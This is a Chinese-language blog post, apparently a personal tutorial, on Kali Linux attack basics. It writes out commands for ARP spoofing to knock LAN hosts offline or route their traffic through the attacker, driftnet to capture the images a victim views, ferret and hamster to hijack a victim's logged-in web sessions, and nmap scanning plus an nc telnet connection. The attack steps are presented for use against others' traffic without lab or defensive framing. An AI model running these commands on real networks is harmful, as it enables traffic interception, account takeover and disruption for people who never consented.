Kali渗透基础

######局域网断网攻击

fping -asg 192.168.1.0/24  ##扫描0网段所有能ping通的ip

nmap  -Ss  192.168.1.141 ##扫描141主机打开的端口


arp攻击

arpspoof -i 自己的网卡 -t  目标IP  目标网关

例如:arpspoof  -i   eth0   -t  192.168.1.100 192.168.1.1


######局域网arp欺骗

目标的IP流量经过我的网卡,从网关出去

首先,进行IP流量转发

echo 1 >/proc/sys/net/ipv4/ip_forward (echo写命令,是不会有回显的)

再进行arpspoof命令

arpspoof  -i   eth0   -t  192.168.1.100 192.168.1.1

此时目标的流量将会经过我的网卡,就成为了arp欺骗

driftnet ##获取本机网卡的图片

因为目标的流量此时经过我的网卡,所以我获取本机网卡图片=获得目标所浏览图片


#######会话劫持——登陆别人登录过的网站

所用软件:

wireshark ##抓包

ferret ##重新生成抓包后的文件

hamster ##重放流量


首先对目标进行arp欺骗,然后用wireshark进行抓包

当目标登陆了某些网站时,wireshark上会显示很多DNS的信息

此时停止抓包,将文件保存为pcap格式,关闭wireshark,

进入保存文件的目录,使用ferret   -r   文件名  命令,生成一个.txt的文件,此时执行hamster命令,会生成一些信息(127.0.0.1:1234)

意思是把代理改为127.0.0.1的1234端口

然后在浏览器输入127.0.0.1:1234即可看到一个ip,点击后进入,有很多地址,在其中找到我们需要的即可


第二种方法:

不用欺骗了

ferret -i eth0

另开一个标签

hamster

改代理端口,同上



Nmap基础学习

nmap 192.168.1.102     扫描此ip地址开放的所有端口

也支持多个ip同时扫描

nmap 192.168.1.102 192.168.8.223

或在同一个子网下:nmap 192.168.1.102,24,171 同时扫描3个ip地址

也可以将需要扫描的ip地址存在一个文件里,通过nmap -iL filename 扫描文件里所有的ip

随机扫描:nmap -iR 3     随机扫描3个ip(我也没搞清楚是什么里的3个)

排除某些ip扫描:如:nmap  10.73.26.0/24 --exclude 10.73.26.183-190 (扫描所有ip除了183到190)

                                        nmap 10.73.26.0/24 --excludefile file.txt  (扫描所有ip除了file.txt里的ip)

扫描开放网络端口:

                                        nmap -o 识别远程操作系统

                                                   -sC 运行默认的脚本扫描

                                                    -A 10.73.31.64

                                                   

可以在扫描出端口后,若有23端口telnet开放,可以使用netcat进行远程连接:

命令:nc ipaddress 23





  • 7
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值